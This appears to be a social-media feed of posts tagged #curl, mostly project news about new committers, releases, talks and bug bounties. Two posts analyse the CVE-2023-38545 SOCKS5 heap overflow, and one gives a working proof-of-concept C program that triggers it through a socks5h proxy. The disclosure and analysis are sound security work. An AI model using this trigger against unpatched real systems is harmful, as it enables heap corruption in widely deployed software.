Skip to main content

Search

Items tagged with: cURL


#curl curl-for-win now supports building reproducible Linux, Linux MUSL and macOS binaries: github.com/curl/curl-for-win/p…
#curl


Welcome Alex Bozarth as #curl committer 1209: github.com/curl/curl/pull/1203…
#curl


Assassin's Creed Mirage ❤️ #curl (thanks to Patrik Svensson)
#curl


Attempt 1. What happens when you invoke #curl. In a single picture.
#curl


New plot added to old graph. Number of lines of code in the #curl tool. From 3,400 lines back in 2000 when libcurl was created, to 22,800 lines now.
#curl


Welcome Turiiya as #curl committer 1208: github.com/curl/curl/pull/1218…
#curl


in the #curl project, we have already done more commits in 2023 than any single previous year since 2014. If we manage 152 more commits this year, 2023 will become the most-commits year since 2004, which remains our top year with 2102 commits in a single year.

Things you figure out when you have graphs.

#curl


Welcome rilysh as #curl committer 1207: github.com/curl/curl/pull/1217…
#curl


Brodie speaks up about the AI generated security report crap the #curl project received recently, and I think he does it nicely.

youtu.be/r0-tKuoiagY?si=QjxaFt…

#curl


On this day, six years ago, I was awarded the Polhem Prize for my work on #curl - and went home with a gold medal that was handed to me by the King of Sweden. A night to remember.

daniel.haxx.se/blog/2017/10/20…

#curl


TBH that kinda matches the description.

After all, your work on #wolfSSL and #curl is something noone outside of the know even is aware of but millions pf people if not billions of devices rely on daily...

Really like that XKCD dependency stack...


Later this afternoon in #Stockholm I will blab #curl (again):

nordicapis.com/sessions/next-l…


We disclosed this #hackerone report against #curl when someone asked Bard to find a vulnerability, and it hallucinated together something:

hackerone.com/reports/2199174


Latest BASH (version 5.2) and CURL (version 8.4.0) is available for IBM i. 😍
Thank you, IBM!

As always update using yum or ACS.

BASH 5.2 release note: lists.gnu.org/archive/html/bas…
CURL 8.4.0 changelog: curl.se/changes.html#8_4_0

#IBMi #IBMiOSS #bash #curl


The first HTTP/3 code landed in #curl in 2019. Now we might soon have it enabled for real and not "experimental" anymore: curl.se/mail/lib-2023-10/0023.…
#curl


Welcome Marcin Rataj as #curl committer 1205: github.com/curl/curl/pull/1213…
#curl


this is a key step towards getting HTTP/3 support in #curl by default and not experimental...
#curl


Welcome LoRd_MuldeR as #curl committer 1204: github.com/curl/curl/pull/1213…
#curl


Welcome Carlos Henrique Lima Melara as #curl commiiter 1203: github.com/curl/curl/pull/1212…
#curl


#curl bug-bounty award amounts, after the two most recent ones. Accumulated 68,320 USD now. The new curl record payout was 4660 USD for CVE-2023-38545.
#curl


Welcome Sohom Datta as #curl committer 1202: github.com/curl/curl/pull/1211…
#curl


Good question.

The only person I know that is even remotely into that stuff may be @ncommander.

After all, #backporting #curl to legacy #FreeBSD sounds like the kind of #SoftwareGore and #DigitalMasochism he's likes to showcase on his #YouTube channel...


Anyone happen to know anything about #FreeBSD (legacy) header files and wants to help us out with a #curl build issue?

github.com/curl/curl/pull/1210…


This week many engineering teams are looking for the immensely popular open source library 'curl' in order to get ahead of the CVE-2023-38545 vulnerability. Most of them are NOT going to see it in their SBOM even though they use it.

In this article I walk through why this is, places it might be hiding and questions to ask that can help uncover your use of it.

zebracatzebra.com/oss/curl-is-… #curl #sca #sbom


I watched “Mastering the curl command line with @bagder

It took me more than a week and it was totally worth it!

youtube.com/watch?v=V5vZWHP-Rq…

#curl


#curl runs in all your devices (oct 2023 edition)
#curl


Welcome Alex Klyubin as #curl committer 1201 with PR 12101 (now that is a fun number coincidence): github.com/curl/curl/pull/1210…
#curl


Your regular reminder that the #curl team is often available for real-time chat on IRC: curl.se/docs/irc.html
#curl


Next week on "Platform Summit 2023" in Stockholm I am going to talk "next level curl" nordicapis.com/sessions/next-l…

30 minutes of fun #curl things brought in the last few years

#curl


The #curl 8.4.0 release video is up: youtu.be/-j-_nKmq2aE
#curl


Why did the #curl #CVE202338545 vulnerability hide from static analysis tools?

The main reason for this is the type of code structure in question. In general state engines are quite difficult for static analysis tools, since as the name implies the state of the various variables depend on runtime state changes.

The code attempts to determine whether it is safe to use the provided host name for remote resolution. Since the code does not function correctly with host names longer than 255 characters, it falls back to using “socks5://” protocol (local name resolution) if the host name is longer. When the name is too long, the code forces “local name resolution” by setting “socks5_resolve_local” variable to TRUE.

Unfortunately this “socks5_resolve_local” variable isn’t stored in the “socks_state” structure as it should have been. For each state “step” the initial value for the variable is determined with:

bool socks5_resolve_local =
(conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

The INIT state then set the “socks5_resolve_local” to TRUE if the host name is too long:

/* RFC1928 chapter 5 specifies max 255 chars for domain name in packet */
if(!socks5_resolve_local && hostname_len > 255) {
infof(data, "SOCKS5: server resolving disabled for hostnames of "
"length > 255 [actual len=%zu]", hostname_len);
socks5_resolve_local = TRUE;
}

But this check is *only* done in INIT state. When the state is anything else, the initial value is used.

Now, later CONNECT_RESOLVE_REMOTE state checks if remote name resolution should be used or not:

if(!socks5_resolve_local) {
if (… sx->hostname is literal IPv6 address …) {
… use ipv6 address direct …
}
else if (… sx->hostname is literal IPv4 address …) {
… use ipv4 address direct …
}
else {
socksreq[len++] = 3;
socksreq[len++] = (char) hostname_len; /* one byte address length */
memcpy(&socksreq[len], sx->hostname, hostname_len); /* w/o NULL */
len += hostname_len;
}
}
As “socks5_resolve_local” flag is FALSE for the excessively long hostname the “socksreq” heap buffer will be overflown by the memcpy call.

There is no obvious way for the static analysis tools to determine that “socks5_resolve_local” might be set incorrectly for some of the states. Runtime #fuzzing will find this flaw quite easily, but unfortunately no fuzzing was performed for this specific functionality.

#vulnerability #staticanalysis #infosec


I'll get the stream up at twitch.tv/curlhacker in a few minutes and do the #curl release presentation there at the top of the hour.
#curl


Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht… for more details.

#infosec


"Most usage of #curl is as a command-line utility"

I would not have put it that way...

theregister.com/2023/10/10/cur…

#curl